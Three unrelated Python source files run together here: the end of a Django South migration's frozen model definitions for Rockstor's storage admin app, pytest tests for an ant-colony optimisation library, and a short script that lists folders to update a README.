'hostname': ('django.db.models.fields.CharField', [], {'default': "'Rockstor'", 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'mgmt_port': ('django.db.models.fields.IntegerField', [], {'default': '443'}),
'uuid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'storageadmin.configbackup': {
'Meta': {'object_name': 'ConfigBackup'},
'config_backup': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True'}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'md5sum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'storageadmin.containeroption': {
'Meta': {'object_name': 'ContainerOption'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DContainer']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'val': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'})
},
'storageadmin.dashboardconfig': {
'Meta': {'object_name': 'DashboardConfig'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'}),
'widgets': ('django.db.models.fields.CharField', [], {'max_length': '4096'})
},
'storageadmin.dcontainer': {
'Meta': {'object_name': 'DContainer'},
'dimage': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DImage']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'launch_order': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '1024'}),
'rockon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.RockOn']"})
},
'storageadmin.dcontainerlink': {
'Meta': {'unique_together': "(('destination', 'name'),)", 'object_name': 'DContainerLink'},
'destination': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'destination_container'", 'to': "orm['storageadmin.DContainer']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'source': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['storageadmin.DContainer']", 'unique': 'True'})
},
'storageadmin.dcustomconfig': {
'Meta': {'unique_together': "(('rockon', 'key'),)", 'object_name': 'DCustomConfig'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'rockon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.RockOn']"}),
'val': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'storageadmin.dimage': {
'Meta': {'object_name': 'DImage'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'repo': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'storageadmin.disk': {
'Meta': {'object_name': 'Disk'},
'btrfs_uuid': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'offline': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parted': ('django.db.models.fields.BooleanField', [], {}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'serial': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'smart_available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'smart_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'transport': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'vendor': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'storageadmin.dport': {
'Meta': {'unique_together': "(('container', 'containerp'),)", 'object_name': 'DPort'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DContainer']"}),
'containerp': ('django.db.models.fields.IntegerField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'hostp': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'hostp_default': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'protocol': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'uiport': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.dvolume': {
'Meta': {'unique_together': "(('container', 'dest_dir'),)", 'object_name': 'DVolume'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DContainer']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'dest_dir': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'min_size': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']", 'null': 'True'}),
'uservol': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.emailclient': {
'Meta': {'object_name': 'EmailClient'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '1024'}),
'receiver': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'smtp_server': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'storageadmin.group': {
'Meta': {'object_name': 'Group'},
'admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'gid': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'groupname': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'storageadmin.installedplugin': {
'Meta': {'object_name': 'InstalledPlugin'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'install_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'plugin_meta': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Plugin']"})
},
'storageadmin.iscsitarget': {
'Meta': {'object_name': 'IscsiTarget'},
'dev_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'dev_size': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']"}),
'tid': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'tname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'storageadmin.netatalkshare': {
'Meta': {'object_name': 'NetatalkShare'},
'description': ('django.db.models.fields.CharField', [], {'default': "'afp on rockstor'", 'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'share': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'netatalkshare'", 'unique': 'True', 'to': "orm['storageadmin.Share']"}),
'time_machine': ('django.db.models.fields.CharField', [], {'default': "'yes'", 'max_length': '3'})
},
'storageadmin.networkinterface': {
'Meta': {'object_name': 'NetworkInterface'},
'autoconnect': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True'}),
'ctype': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'dname': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'dns_servers': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'dspeed': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'dtype': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'gateway': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ipaddr': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'itype': ('django.db.models.fields.CharField', [], {'default': "'io'", 'max_length': '100'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'method': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'netmask': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'})
},
'storageadmin.nfsexport': {
'Meta': {'object_name': 'NFSExport'},
'export_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.NFSExportGroup']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mount': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']"})
},
'storageadmin.nfsexportgroup': {
'Meta': {'object_name': 'NFSExportGroup'},
'admin_host': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'editable': ('django.db.models.fields.CharField', [], {'default': "'rw'", 'max_length': '2'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'host_str': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mount_security': ('django.db.models.fields.CharField', [], {'default': "'insecure'", 'max_length': '8'}),
'nohide': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'syncable': ('django.db.models.fields.CharField', [], {'default': "'async'", 'max_length': '5'})
},
'storageadmin.oauthapp': {
'Meta': {'object_name': 'OauthApp'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['oauth2_provider.Application']", 'unique': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.User']"})
},
'storageadmin.plugin': {
'Meta': {'object_name': 'Plugin'},
'css_file_name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'description': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4096'}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'unique': 'True', 'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'js_file_name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'})
},
'storageadmin.pool': {
'Meta': {'object_name': 'Pool'},
'compression': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mnt_options': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'raid': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'storageadmin.poolbalance': {
'Meta': {'object_name': 'PoolBalance'},
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'percent_done': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']"}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '10'}),
'tid': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True'})
},
'storageadmin.poolscrub': {
'Meta': {'object_name': 'PoolScrub'},
'corrected_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'csum_discards': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'csum_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'data_extents_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kb_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'last_physical': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'malloc_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'no_csum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'pid': ('django.db.models.fields.IntegerField', [], {}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']"}),
'read_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '10'}),
'super_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tree_bytes_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'tree_extents_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'uncorrectable_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'unverified_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'verify_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storageadmin.posixacls': {
'Meta': {'object_name': 'PosixACLs'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'perms': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'smb_share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SambaShare']"})
},
'storageadmin.rockon': {
'Meta': {'object_name': 'RockOn'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'https': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icon': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'more_info': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'ui': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'volume_add_support': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'})
},
'storageadmin.sambacustomconfig': {
'Meta': {'object_name': 'SambaCustomConfig'},
'custom_config': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'smb_share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SambaShare']"})
},
'storageadmin.sambashare': {
'Meta': {'object_name': 'SambaShare'},
'browsable': ('django.db.models.fields.CharField', [], {'default': "'yes'", 'max_length': '3'}),
'comment': ('django.db.models.fields.CharField', [], {'default': "'foo bar'", 'max_length': '100'}),
'guest_ok': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'read_only': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'shadow_copy': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'share': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'sambashare'", 'unique': 'True', 'to': "orm['storageadmin.Share']"}),
'snapshot_prefix': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'storageadmin.setup': {
'Meta': {'object_name': 'Setup'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'setup_disks': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'setup_network': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'setup_system': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'setup_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.sftp': {
'Meta': {'object_name': 'SFTP'},
'editable': ('django.db.models.fields.CharField', [], {'default': "'ro'", 'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'share': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['storageadmin.Share']", 'unique': 'True'})
},
'storageadmin.share': {
'Meta': {'object_name': 'Share'},
'compression_algo': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'eusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'group': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'owner': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '4096'}),
'perms': ('django.db.models.fields.CharField', [], {'default': "'755'", 'max_length': '9'}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']"}),
'pqgroup': ('django.db.models.fields.CharField', [], {'default': "'-1/-1'", 'max_length': '32'}),
'qgroup': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'replica': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'rusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'subvol_name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'storageadmin.smartattribute': {
'Meta': {'object_name': 'SMARTAttribute'},
'aid': ('django.db.models.fields.IntegerField', [], {}),
'atype': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'failed': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'flag': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'normed_value': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'raw_value': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'threshold': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'worst': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storageadmin.smartcapability': {
'Meta': {'object_name': 'SMARTCapability'},
'capabilities': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'flag': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'storageadmin.smarterrorlog': {
'Meta': {'object_name': 'SMARTErrorLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'line': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'storageadmin.smarterrorlogsummary': {
'Meta': {'object_name': 'SMARTErrorLogSummary'},
'details': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'error_num': ('django.db.models.fields.IntegerField', [], {}),
'etype': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'lifetime_hours': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'storageadmin.smartidentity': {
'Meta': {'object_name': 'SMARTIdentity'},
'assessment': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'ata_version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'capacity': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'device_model': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'enabled': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'firmware_version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_smartdb': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'model_family': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'rotation_rate': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'sata_version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'scanned_on': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'sector_size': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'serial_number': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'supported': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'world_wide_name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'storageadmin.smartinfo': {
'Meta': {'object_name': 'SMARTInfo'},
'disk': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Disk']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'storageadmin.smarttestlog': {
'Meta': {'object_name': 'SMARTTestLog'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'lba_of_first_error': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'lifetime_hours': ('django.db.models.fields.IntegerField', [], {}),
'pct_completed': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'test_num': ('django.db.models.fields.IntegerField', [], {})
},
'storageadmin.smarttestlogdetail': {
'Meta': {'object_name': 'SMARTTestLogDetail'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'line': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'storageadmin.snapshot': {
'Meta': {'unique_together': "(('share', 'name'),)", 'object_name': 'Snapshot'},
'eusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'qgroup': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'real_name': ('django.db.models.fields.CharField', [], {'default': "'unknownsnap'", 'max_length': '4096'}),
'rusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']"}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'snap_type': ('django.db.models.fields.CharField', [], {'default': "'admin'", 'max_length': '64'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'uvisible': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'writable': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.supportcase': {
'Meta': {'object_name': 'SupportCase'},
'case_type': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '9'}),
'zipped_log': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'storageadmin.tlscertificate': {
'Meta': {'object_name': 'TLSCertificate'},
'certificate': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12288'})
},
'storageadmin.user': {
'Meta': {'object_name': 'User'},
'admin': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'gid': ('django.db.models.fields.IntegerField', [], {'default': '5000'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Group']", 'null': 'True', 'blank': 'True'}),
'homedir': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True', 'blank': 'True'}),
'shell': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'smb_shares': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'admin_users'", 'null': 'True', 'to': "orm['storageadmin.SambaShare']"}),
'uid': ('django.db.models.fields.IntegerField', [], {'default': '5000'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'suser'", 'unique': 'True', 'null': 'True', 'to': u"orm['auth.User']"}),
'username': ('django.db.models.fields.CharField', [], {'default': "''", 'unique': 'True', 'max_length': '4096'})
}
}
complete_apps = ['storageadmin'] | schakrava/rockstor-core | src/rockstor/storageadmin/south_migrations/0037_auto__chg_field_networkinterface_autoconnect__chg_field_networkinterfa.py | Python | gpl-3.0 | 42,159 |
# -*- coding: utf-8 -*-
import pytest
import networkx
from acopy import Ant
from acopy import Solution
def test_ant_get_unvisited_nodes():
graph = networkx.Graph({0: [1, 2, 3]})
solution = Solution(graph, start=0)
moves = set(Ant().get_unvisited_nodes(graph, solution))
assert moves == {1, 2, 3}
def test_ant_get_unvisited_nodes_when_self_edges():
graph = networkx.Graph({0: [0, 1, 2, 3]})
solution = Solution(graph, start=0)
moves = set(Ant().get_unvisited_nodes(graph, solution))
assert moves == {1, 2, 3}
def test_ant_get_unvisited_nodes_when_no_edges():
graph = networkx.Graph({0: []})
solution = Solution(graph, start=0)
moves = set(Ant().get_unvisited_nodes(graph, solution))
assert not moves
def test_ant_score_edge():
ant = Ant(alpha=1, beta=1)
score = ant.score_edge({'weight': 1, 'pheromone': 1})
assert score == 1
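    # score_edge presumably follows the usual ACO rule
    # pheromone**alpha * (1/weight)**beta, which evaluates to 1 here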
def test_ant_score_edge_when_no_weight():
ant = Ant(alpha=1, beta=1)
score = ant.score_edge({'pheromone': 1})
assert score == 1
def test_ant_score_edge_when_no_pheromone():
ant = Ant(alpha=1, beta=1)
with pytest.raises(KeyError):
ant.score_edge({'weight': 1})
| rhgrant10/Pants | tests/test_ant.py | Python | gpl-2.0 | 1,186 |
# This is a little script to update the README.md file according to the current status of the folder
# Author: Your dear boyfriend/coding genius.
# import module
import os
# update places we have been
def updatePlace():
    places = []
    for filename in os.listdir("."):
        # skip hidden folders such as .git
        if filename.startswith("."):
            continue
        if os.path.isdir(os.path.join(os.path.abspath("."), filename)):
            places.append(filename)
    if not places:
        return "# We have been to: nowhere yet\n"
    if len(places) == 1:
        return "# We have been to: " + places[0] + "\n"
    result = "# We have been to: " + ", ".join(places[:-1])
    result += " and " + places[-1]
    return result + "\n"
